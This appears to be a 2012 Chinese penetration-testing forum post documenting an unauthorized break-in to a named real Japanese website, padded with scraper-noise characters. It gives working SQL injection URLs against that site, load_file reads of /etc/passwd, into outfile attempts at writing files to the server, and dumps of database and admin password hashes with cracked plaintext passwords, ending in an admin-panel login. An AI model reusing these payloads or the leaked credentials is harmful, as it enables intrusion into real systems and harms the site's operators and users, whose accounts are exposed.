中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

. |/ j1 k5 ~, @! ~2 N. g* l: M2 _. I# Y* W5 z/ H: z
0x01. 检测 www.zuaa.jp 收集数据9 N$ H5 w# ~! ?, Y
[attach]73[/attach]
0 ^3 G4 G: m& i- X& y* h- g0 k, ?  _' ^) F$ o
whatweb
: e9 g+ V0 V9 ?+ L( Q( N[attach]74[/attach]3 _9 R4 A$ s! F6 T& e4 U$ L

; m/ F# \" @$ G! X+ l& }, @; @利用NMAP扫描
( f+ O1 D- ?% V- [8 N[attach]75[/attach]9 e9 E7 c1 X& r; Z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ ^; l6 \/ l5 `# w9 v8 V
0x02.找注入点
* b7 ^: w% E) U  h; h, V5 c6 @( w找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
- M5 k' V" N1 k# R) ~( R[attach]76[/attach]8 p5 E6 j$ d& H* }& [% z4 p  j
- K$ b( j  P6 _& H+ ^1 x1 ^
0x03.order by0 ?% T- l5 `5 F+ i# r3 M: G  {/ H" W$ n
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1: F! i3 B8 }7 k6 a, ], a  {8 u0 e
[attach]77[/attach]& e+ w7 R/ E" F, l1 X
order by 28报错,order by 27正常6 u- H* j8 N3 E1 ]( z: t: J- M! j

8 `) c9 }& L+ L$ m9 b! f! z4 R0x04.   union手动查询
; G0 k0 |2 J( ]$ `- p2 N4 y* \! b1 Whttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) g+ T5 r3 g  }1 S3 F添加到 27 时正常显示 2 [# t, g3 M1 f7 y
[attach]78[/attach]# e) p# e& e+ h( p5 H
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  c9 J! q/ M, p. U: [% h8 C7 B. u
  Z/ ]- @/ ~' B* S9 s$ v+ c0x05. info:
; C* R3 L& _& C( Y9 n0 ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ U! D* @. \7 V: E6 h[attach]79[/attach]) X# N* z" d# X0 `* W: J
user:            root@localhost$ x+ W1 B* h. [
database:    openpne
: F0 _+ N7 c! ^" O5 \version:      4.1.22
) f- i4 Z& m5 k/ i: g3 Xos:             portbld-freebsd5.43 o/ h; U7 i% ]: q+ i( @

7 P" s* T% b3 s! V- n0x06. root用户
5 E: w6 B  a' {: Y5 O( s利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
1 F' k6 T; h( k0 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) E1 y. o3 X, g5 G/ W9 |[attach]80[/attach]7 S& i2 O( `8 u# K
通过工具转换9 j/ a7 q0 i1 l9 ^
[attach]81[/attach]
. P! z2 T/ l" j4 C中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 T, D+ x* Z# Z8 S5 b# U* ]# j7 U* ?: f5 h! Z  q$ K/ \4 I
0x07. 利用 into outfile
3 B9 W( ?0 U2 f/ R+ T全部都失败1 K1 o- Z0 b! I3 \& p$ S+ ]
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php# [! f1 k6 y6 m7 U0 V8 z

) ^+ R+ R' A( ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
; ^# Z. R% P7 o; C1 J
+ G( b/ S# G% X( A页面显示“MDB2 Error:syntax error”
2 M0 X9 w& V1 }# P2 D# x1 h/ M8 \! e
0x08. 利用 mysql 4.1. ?& B5 r1 j# a3 @. J# Q( x- m
猜常规表名,字段未果 工具 sqlmap. j, o: \4 l& q
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 @, ^7 m$ l! v( ~7 O7 k8 `; B# s5 ?

8 p8 V+ V& T3 o- _( F2 T[attach]82[/attach]
* y4 `+ v1 B7 k! C. H. \) a4 S8 a& F" O8 Y  Y. g3 v% h
0x09. 查找后台
$ O% d; d& G( e% r! Q8 ^利用 现有的各种 后台工具尝试都不行. q' |% \( |1 s4 y  }6 {' K2 ~

$ d+ O& D- R3 J' _2 w8 a0x10.  MySL外联方法
5 ^% W1 l2 I' Q2 c9 f: n从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行0 Y- }. \/ s, u3 N; O0 s6 o+ g
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
. i( M& R) `' L. Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
. A; |1 B" W# a/ _[attach]83[/attach]3 Y6 _# J0 d) |) E! A4 `
这个可以在 www.cmd5.com 解密" A# A1 E% O0 _  r5 i
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
  D7 n6 u* Z5 X( o3 [1 Y- Tchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
' I* U1 @+ H7 m/ _openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???% C3 o; |1 }* w  X
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???/ }% L; T6 @( t  a; t
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知# d1 Y% o# }, h; z5 S2 A6 s
[attach]84[/attach]
( v( a4 B& P2 z
$ |/ X: z8 p$ q+ U. l0x11. 网站突破3 Z! m: j$ S; ^% T1 S
发现网站的源程序 openpne, google 下载 openpne 源码% ^6 d% d: @/ D' Y/ W+ P  a
[attach]85[/attach]
  K. v: h' N- X9 q9 T# v+ p: G; t  Y
0x12. 默认信息利用' _8 z! N' b% Q6 V1 ^. Y+ C
http://sns.zuaa.jp/?m=admin&a=page_login
$ t& D6 L4 r6 H* [8 i/ E[attach]86[/attach]
1 u# [# ?* H/ L) U表名 (c_admin_user) ,字段名(username,password)1 ]8 T" W  @) m0 }; B
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user+ l9 w: [4 W' i4 s) O" _/ c
[attach]87[/attach]6 {; J8 n6 g4 J$ p: }
解密9 I8 B+ }4 h; G9 T) ^& p
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009/ A8 h6 Q! c+ K
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
) e8 h& ~# C! `% l4 o/ W. a
! S- D! H) T1 _0 _( v中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ S6 |7 a3 }# p  N
8 h, ?6 J* N9 }3 h+ O, _0x13. 登录后台' e+ s. F' i6 R  ~
[attach]88[/attach]
) N& G! `. I$ j% k/ j8 x$ [- H
- t: c' T  E& Y- s- r% Q7 U3 ]! `7 X; k, U# l& }* N1 p
0x14. 小结! u9 ]3 v5 ?! u1 ~3 d/ ?5 X( s( `
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
5 T0 S: k* c, b  _; y# G感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点; G; |* L) {& k. s8 J, i
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain7 A! F- v2 u! J( q' x
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ J3 U5 x0 a  y' ?: a/ F7 O8 n7 j
5 R5 C! j/ J0 z; C9 q( ~0 {最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!/ h; h  ]5 K! y6 U9 |

作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2